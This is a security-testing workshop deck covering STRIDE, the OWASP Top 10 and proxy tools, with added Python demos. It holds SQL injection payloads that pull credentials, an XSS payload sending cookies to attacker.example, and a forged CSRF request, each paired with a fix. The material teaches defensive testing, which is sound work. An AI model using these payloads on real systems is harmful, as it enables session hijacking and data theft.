Daniel billing exploring the security testers toolbox

  1. Exploring the Security Testers Toolkit
     Dan Billing – New Voice Media
     @thetestdoctor | thetestdoctor.wordpress.com
  2. Objectives for the day
     - Introductions
     - An introduction to threat modelling and an activity to generate test ideas
     - An introduction to the OWASP Top 10
     - An introduction to some useful tools and how to use them
     - Explore an application to discover some vulnerabilities
     - Talk about threats and what they mean in context
     - Talk about attacks and how they can be used in testing
     - Practice some attacks
     - Consolidate and challenge our thinking
  3. Introduction
     - Tester for 13 years, 4 years as a self-employed consultant
     - Worked in the private and public sector in the UK: AOL Time Warner, Capita, Northgate, UK Government, Brightpearl
     - Now a Test Engineer at New Voice Media
     - @TheTestDoctor
     - www.thetestdoctor.wordpress.com
  4. Introductions
     - About you?
     - What do you want to get out of the day?
  5. A Security Testing Mnemonic (the initials spell EXTERMINATE)
     - EX – EXPLORE
     - T – THREATS
     - E – EXPERIMENT
     - R – RISKS
     - M – MONITOR
     - IN – INTERROGATE
     - A – ANALYSIS
     - T – TARGETED
     - E – EXPEDITED
     Image courtesy of Andy Glover @cartoontester
  6. Gruyere – the cheesy web app
     - Navigate your browser of choice to: http://google-gruyere.appspot.com/start
     - Built by Google
     - Deliberately vulnerable web application for training
     - Don't enter personal data into it!
  7. AltoroMutual – the reliable banking application
     - Navigate your browser of choice to: http://altoromutual.com/
     - Built by IBM (as a marketing tool for AppScan)
     - Deliberately vulnerable web application for training
     - Don't enter personal data into it!
  8. Explore the application
     - Work in groups
     - Explore the application for 10-15 mins
     - What can you find out? User scenarios? What can you do with the application?
     - Critical assets? Features and functionality? Areas for testing?
     - Feedback to the group
  9. Tools of the Trade – Browser tools
     - Built-in DOM tools and consoles – available in all modern browsers
     - Firebug: monitor errors, resources, traffic and scripts; add, delete and modify cookies
     - Plugins e.g. Tamper Data, EditThisCookie
     - OWASP Mantra
     - API tools e.g. Postman, Advanced Rest Client
  10. Tools of the Trade – Proxy tools
     - Fiddler, Zed Attack Proxy, BurpSuite
     - Intercept HTTP/HTTPS traffic
     - Modify requests, headers, cookies and other session data
     - Craft attacks and other harmful scenarios
     - Spider, fuzzers, port scanning, CSRF
  11. Tools of the Trade – Network monitors and source code analysers
     - Protocol and packet sniffing e.g. Wireshark
     - Network mapping e.g. Nmap
     - Source code analysers: OWASP O2 Platform, OWASP LAPSE
  12. Fiddler
     - Download and install Fiddler: http://www.telerik.com/fiddler
     - Configure your browser: set the proxy server to 127.0.0.1, port 8080
     - Configure Fiddler: set the local proxy to 127.0.0.1, port 8080
     - Install the proxy's certificate if required (the browser must trust the proxy's CA certificate before HTTPS traffic can be intercepted)
     - You may need to close and restart the browser/Fiddler
  13. Zed Attack Proxy (ZAP)
     - Download and install Zed Attack Proxy: https://www.owasp.org/index.php/OWASP_Zed_Attack_Proxy_Project
     - Configure your browser: set the proxy server to 127.0.0.1, port 8181
     - Configure Zed Attack Proxy: set the local proxy to 127.0.0.1, port 8181
     - Install the proxy's certificate if required (needed for HTTPS interception)
     - You may need to close and restart the browser/ZAP
  14. BurpSuite
     - Download and install BurpSuite (Free Edition): http://portswigger.net/burp/download.html
     - Configure your browser: set the proxy server to 127.0.0.1, port 8282
     - Configure BurpSuite: set the local proxy listener to 127.0.0.1, port 8282 (the browser's proxy port must match the listener port; 8282 keeps Burp apart from Fiddler on 8080 and ZAP on 8181 so all three can run at once)
     - Install the proxy's certificate if required (needed for HTTPS interception)
     - You may need to close and restart the browser/Burp
  15. Threat Modelling – STRIDE
     - S – SPOOFING
     - T – TAMPERING
     - R – REPUDIATION
     - I – INFORMATION DISCLOSURE
     - D – DENIAL OF SERVICE
     - E – ESCALATION OF PRIVILEGE
  16. Spoofing
     Threat action aimed at illegally accessing and using another user's credentials, such as username and password.
  17. Tampering
     Threat action aimed at maliciously changing or modifying persistent data, such as data in a database, or altering data in transit between two computers over an open network such as the Internet.
  18. Repudiation
     Threat action aimed at performing illegal operations in a system that lacks the ability to trace the prohibited operations.
  19. Information Disclosure
     Threat action to read a file that one was not granted access to, or to read data in transit.
  20. Denial of Service
     Threat aimed at denying access to valid users, such as by making a web server temporarily unavailable or unusable.
  21. Escalation of Privilege
     Threat aimed at gaining privileged access to resources in order to gain unauthorised access to information or to compromise a system.
  22. Threat Mind Map
     - Grab some post-its
     - Identify threats to your application – Gruyere or AltoroMutual
     - How might they happen? What are the risks? What might be the impact?
     - Mind-map them as a team on the board
     - Feedback to the group
  23. OWASP Top 10 2013
     - 1 – Injection
     - 2 – Broken Authentication and Session Management
     - 3 – Cross Site Scripting (XSS)
     - 4 – Insecure Direct Object References
     - 5 – Security Misconfiguration
     - 6 – Sensitive Data Exposure
     - 7 – Missing Function Level Access Control
     - 8 – Cross Site Request Forgery (CSRF)
     - 9 – Using Components with Known Vulnerabilities
     - 10 – Unvalidated Redirects and Forwards
  24. SQL Injection
     Exploits of a Mom – www.xkcd.com/327
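The slide only shows the xkcd comic, so here is the mechanism in runnable form. This is an added example, not code from the workshop or from Gruyere/AltoroMutual: a constructed in-memory SQLite database with a `students` table and a separate `users` table, a lookup that pastes user input into the SQL text, and the parameterised version beside it. The tautology and UNION payloads are the two classic first probes a tester sends through the proxy.

```python
import sqlite3
from typing import List, Tuple

# Constructed sample schema and rows for the demo (not the schema of any real application).
def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        """
        CREATE TABLE students (id INTEGER PRIMARY KEY, name TEXT, grade TEXT);
        INSERT INTO students (name, grade) VALUES ('Robert', 'A'), ('Alice', 'B'), ('Bob', 'C');
        CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT);
        INSERT INTO users (username, password) VALUES ('admin', 's3cret'), ('jsmith', 'demo1234');
        """
    )
    return conn


def find_student_vulnerable(conn: sqlite3.Connection, name: str) -> List[Tuple[str, str]]:
    # VULNERABLE: the input is spliced into the statement text, so a quote in `name`
    # ends the string literal and the rest of the input becomes SQL.
    sql = "SELECT name, grade FROM students WHERE name = '%s'" % name
    return conn.execute(sql).fetchall()


def find_student_safe(conn: sqlite3.Connection, name: str) -> List[Tuple[str, str]]:
    # HARDENED: the value travels separately from the statement; quotes stay data.
    return conn.execute(
        "SELECT name, grade FROM students WHERE name = ?", (name,)
    ).fetchall()


# Two constructed probe payloads.
TAUTOLOGY = "' OR '1'='1"                                   # WHERE name = '' OR '1'='1'
UNION_DUMP = "' UNION SELECT username, password FROM users --"  # reads a different table


def demo() -> dict:
    conn = make_db()
    return {
        "vuln_tautology": find_student_vulnerable(conn, TAUTOLOGY),  # every student
        "vuln_union": find_student_vulnerable(conn, UNION_DUMP),     # credentials from `users`
        "safe_tautology": find_student_safe(conn, TAUTOLOGY),        # no student is called that
        "safe_union": find_student_safe(conn, UNION_DUMP),
        "safe_normal": find_student_safe(conn, "Alice"),
    }


if __name__ == "__main__":
    for label, rows in demo().items():
        print(label, rows)
```

Note that the comic's stacked `'); DROP TABLE Students;--` would not work against this particular driver, because Python's `sqlite3.execute` refuses to run more than one statement per call; that is an accident of the driver, not a defence, and the UNION payload above extracts data through the same hole without needing a second statement.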
  25. Cross Site Scripting (XSS) – the reflected flow
     1. Attacker sends the victim a URL (to the real site) containing a hidden script
     2. Victim follows the URL containing the script
     3. Site serves a page with the script reflected into it
     4. Victim's browser executes the script, which sends private data (e.g. the session cookie) to the attacker
     5. Attacker impersonates the user at the website
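The five steps above, as an added example that is not part of the workshop material: a constructed attack URL, a search handler that reflects the `q` parameter into HTML unescaped, and the hardened handler beside it. The hostnames, the `q` parameter and the payload are all assumptions made for the demo.

```python
import html
from typing import Callable
from urllib.parse import parse_qs, urlencode, urlparse

# Constructed payload: exfiltrates the cookie to an attacker-controlled host (step 4).
ATTACKER_PAYLOAD = '<script>new Image().src="http://attacker.example/c?"+document.cookie</script>'


def attack_url(base: str, payload: str) -> str:
    # Step 1: the link points at the *real* site; the script hides in a query parameter.
    return base + "?" + urlencode({"q": payload})


def render_results_vulnerable(query: str) -> str:
    # Step 3 (vulnerable): the parameter is echoed straight into the page.
    return "<h1>Results for: %s</h1>" % query


def render_results_hardened(query: str) -> str:
    # HARDENED: HTML-encode on output, including quotes, so the input can only ever be text.
    return "<h1>Results for: %s</h1>" % html.escape(query, quote=True)


def serve(url: str, render: Callable[[str], str]) -> str:
    # Steps 2-3: the victim follows the link; the server reads ?q= and renders the page.
    query = parse_qs(urlparse(url).query).get("q", [""])[0]
    return render(query)


def script_would_execute(page: str) -> bool:
    # Stand-in for the browser in step 4: does a live <script> tag survive in the markup?
    return "<script>" in page


if __name__ == "__main__":
    url = attack_url("http://bank.example/search", ATTACKER_PAYLOAD)
    print(url)
    print(serve(url, render_results_vulnerable))
    print(serve(url, render_results_hardened))
```

When testing through a proxy, the interesting thing to watch is the response, not the request: the same `q` value goes in both times, and the vulnerable response contains it byte-for-byte while the hardened one contains `&lt;script&gt;`.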
  26. Cross Site Request Forgery (CSRF)
     1. Victim, while logged in to the target site, browses a malicious page
     2. A script, hidden form or image tag on that page makes the browser send a request to the target site, and the browser attaches the victim's session cookie automatically
     3. The target site performs the action (send money, change settings, post content) as the victim; the attacker never sees the session, they ride on it
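The attack and the usual fix, as an added example that is not from the workshop: a toy money-transfer handler that accepts any POST arriving with a session cookie, and the same handler protected with a per-session synchroniser token. The `Session`/`Request` types, the forged and legitimate requests and the account figures are all constructed for the demo.

```python
import hmac
import secrets
from dataclasses import dataclass, field
from typing import Dict, Optional


@dataclass
class Session:
    user: str
    balance: int
    # Per-session secret embedded in the site's own forms as a hidden field.
    csrf_token: str = field(default_factory=lambda: secrets.token_hex(16))


@dataclass
class Request:
    method: str
    session: Optional[Session]   # what the browser's cookie resolved to (attached automatically)
    form: Dict[str, str]


def transfer_vulnerable(req: Request) -> str:
    # VULNERABLE: only checks that *a* logged-in session arrived. Any page the victim
    # visits can make the browser send this request with the victim's cookie.
    if req.method != "POST" or req.session is None:
        return "rejected: not logged in"
    req.session.balance -= int(req.form["amount"])
    return "sent %s to %s" % (req.form["amount"], req.form["to"])


def transfer_hardened(req: Request) -> str:
    # HARDENED: the form must carry the session's token; compare in constant time.
    if req.method != "POST" or req.session is None:
        return "rejected: not logged in"
    supplied = req.form.get("csrf_token", "")
    if not hmac.compare_digest(supplied, req.session.csrf_token):
        return "rejected: missing or invalid CSRF token"
    req.session.balance -= int(req.form["amount"])
    return "sent %s to %s" % (req.form["amount"], req.form["to"])


def forged_request(victim: Session) -> Request:
    # Constructed attack: an auto-submitting hidden form on attacker.example. The browser adds
    # the victim's cookie, but the attacker's page cannot read the token (same-origin policy).
    return Request("POST", victim, {"to": "mallory", "amount": "100"})


def legitimate_request(victim: Session) -> Request:
    # The site's own transfer form includes the token as a hidden field.
    return Request("POST", victim, {"to": "bob", "amount": "10", "csrf_token": victim.csrf_token})


if __name__ == "__main__":
    alice = Session("alice", 500)
    print(transfer_vulnerable(forged_request(alice)), alice.balance)
    print(transfer_hardened(forged_request(alice)), alice.balance)
    print(transfer_hardened(legitimate_request(alice)), alice.balance)
```

The test idea for the workshop follows directly: replay a captured state-changing request from the proxy with the token field removed or altered; if it still succeeds, the endpoint is forgeable.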
  27. Using Scanning Tools
     - Practice on a training website or on a virtual machine
     - Agree with stakeholders
     - Don't use against a site you don't have permission to test on
     - Understand risks to assets
     - Schedule appropriately
  28. Passive Scanning
     - Explore the website under test; the tool only watches the traffic it proxies and sends nothing of its own
     - Observe the behaviour of the scanning tool
     - What information does it provide? How is the information structured?
     - Any testing ideas? What would you test first?
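What a passive scanner actually does with the responses flowing through the proxy, as an added example that is not ZAP's or Burp's own code: a few header and cookie checks run over one constructed HTTP response. The sample response, the set of headers checked and the finding strings are all assumptions made for the demo.

```python
from typing import List, Tuple

# Constructed sample response (not captured from Gruyere or AltoroMutual).
SAMPLE_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Server: Apache/2.2.15\r\n"
    "Content-Type: text/html; charset=utf-8\r\n"
    "Set-Cookie: JSESSIONID=8F3A2C; Path=/\r\n"
    "Set-Cookie: prefs=dark; Path=/; HttpOnly; Secure\r\n"
    "\r\n"
    "<html><body>Welcome</body></html>"
)


def parse_headers(raw: str) -> Tuple[str, List[Tuple[str, str]]]:
    """Split a raw response into its status line and (lower-cased name, value) header pairs."""
    head, _, _body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    headers = []
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers.append((name.strip().lower(), value.strip()))
    return lines[0], headers


def passive_checks(raw: str, served_over_https: bool = True) -> List[str]:
    """Passive findings only: nothing here sends a request, it just reads what went past."""
    _status, headers = parse_headers(raw)
    present = {name for name, _ in headers}
    findings: List[str] = []
    for required in ("x-frame-options", "x-content-type-options", "content-security-policy"):
        if required not in present:
            findings.append("missing header: %s" % required)
    if served_over_https and "strict-transport-security" not in present:
        findings.append("missing header: strict-transport-security")
    for name, value in headers:
        if name == "server" and any(ch.isdigit() for ch in value):
            findings.append("server header discloses version: %s" % value)
        if name == "set-cookie":
            cookie_name = value.split("=", 1)[0]
            attrs = [a.strip().lower() for a in value.split(";")[1:]]
            if "httponly" not in attrs:
                findings.append("cookie %s missing HttpOnly" % cookie_name)
            if served_over_https and "secure" not in attrs:
                findings.append("cookie %s missing Secure" % cookie_name)
    return findings


if __name__ == "__main__":
    for finding in passive_checks(SAMPLE_RESPONSE):
        print(finding)
```

Each finding is a test idea rather than a proven vulnerability: a session cookie without `HttpOnly` matters only if there is also an XSS to read it, and a missing `X-Frame-Options` matters only on pages worth clickjacking. That is the "what would you test first?" question on the slide.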
  29. Spidering
     - Discovers more areas of your application to test
     - Sends real requests to the application (it is not passive: every link found is followed)
     - Use with caution
     - What information does it provide? How is the information structured?
     - Any testing ideas?
  30. Active Scanning
     - Sends actual attack payloads to the application under test: injection, XSS, cookie poisoning
     - What information does it provide? How is the information structured?
     - Any testing ideas? What do we test next?
  31. Fuzzing
     - Inputs random, invalid or unexpected data
     - An unhandled exception may indicate a defect that could cause crashes, performance issues or memory leaks
     - What information does it provide? How is the information structured?
     - Any testing ideas?
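A small fuzzer, as an added example that is not code from the workshop or from any of the tools on the earlier slides: a toy `key=value;key=value` parser whose contract is "return a dict or raise ValueError", with a deliberately planted bug, and a mutator that truncates, deletes and inserts special tokens at every position plus a few seeded random byte flips. Anything that escapes as a non-`ValueError` exception is exactly the "unexpected data" signal the slide describes. The target, the seed inputs and the token list are constructed for the demo.

```python
import random
from typing import Callable, Dict, List, Tuple


def parse_record(data: str) -> Dict[str, str]:
    """Toy target. Contract: return a dict, or raise ValueError on malformed input."""
    fields: Dict[str, str] = {}
    for part in data.split(";"):
        if "=" not in part:
            raise ValueError("field without '=': %r" % part)
        key, value = part.split("=", 1)
        # Deliberate bug for the demo: an empty value makes value[0] raise IndexError,
        # which is outside the contract. This is what the fuzzer should surface.
        fields[key] = value[0].upper() + value[1:]
    return fields


def mutate(seed: str, rng: random.Random, rounds: int = 200) -> List[str]:
    """Systematic truncations, single-character deletions and token insertions
    at every offset, plus `rounds` random single-byte replacements."""
    tokens = ["=", ";", "'", "<", "\x00", "A" * 64]
    out: List[str] = []
    for i in range(len(seed) + 1):
        out.append(seed[:i])                      # truncate
        out.append(seed[:i] + seed[i + 1:])       # delete one character
        for tok in tokens:
            out.append(seed[:i] + tok + seed[i:])  # insert a token
    for _ in range(rounds):
        pos = rng.randrange(len(seed))
        out.append(seed[:pos] + chr(rng.randrange(256)) + seed[pos + 1:])
    return out


def fuzz(target: Callable[[str], object], seeds: List[str], seed_value: int = 1) -> List[Tuple[str, str]]:
    """Run `target` on every mutation of every seed; return (input, exception name)
    for inputs whose failure is not the documented ValueError."""
    rng = random.Random(seed_value)          # fixed seed so a run is reproducible
    crashes: List[Tuple[str, str]] = []
    seen = set()
    for s in seeds:
        for case in mutate(s, rng):
            if case in seen:
                continue
            seen.add(case)
            try:
                target(case)
            except ValueError:
                continue                     # expected by the contract
            except Exception as exc:         # anything else is a finding
                crashes.append((case, type(exc).__name__))
    return crashes


# Constructed seed inputs: valid records the fuzzer mutates.
SEEDS = ["len=5;name=abc", "id=7"]


if __name__ == "__main__":
    for bad_input, exc_name in fuzz(parse_record, SEEDS):
        print("%-10s %r" % (exc_name, bad_input))
```

Two things carry over to fuzzing a web application through ZAP or Burp: start from valid, captured requests rather than random bytes, so most mutations reach the interesting code; and decide up front what a "normal" failure looks like (here `ValueError`, there a 400 or a validation message) so that only the abnormal responses are reported.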
  32. Proxy Chaining
     - All tools work differently
     - They all have similar but varied features and functions
     - Linking them together will enhance your testing
     - Compare results from different tools
     - Try modifying the upstream and downstream proxy settings, e.g. point ZAP's upstream proxy at Burp's listener so the browser's traffic passes through both before reaching the site
  33. Extending your toolset
     - Can be built into a continuous integration solution
     - Scripting interfaces e.g. Python, Ruby
     - API
     - Reporting
  34. Wrap Up
     - Is there something we haven't covered that you want to talk about?
     - Has this workshop met your expectations?
     - Any questions?
     - Thanks for taking part
  35. Getting in Touch
     - Twitter @TheTestDoctor
     - Blog thetestdoctor.wordpress.com
     - www.newvoicemedia.com
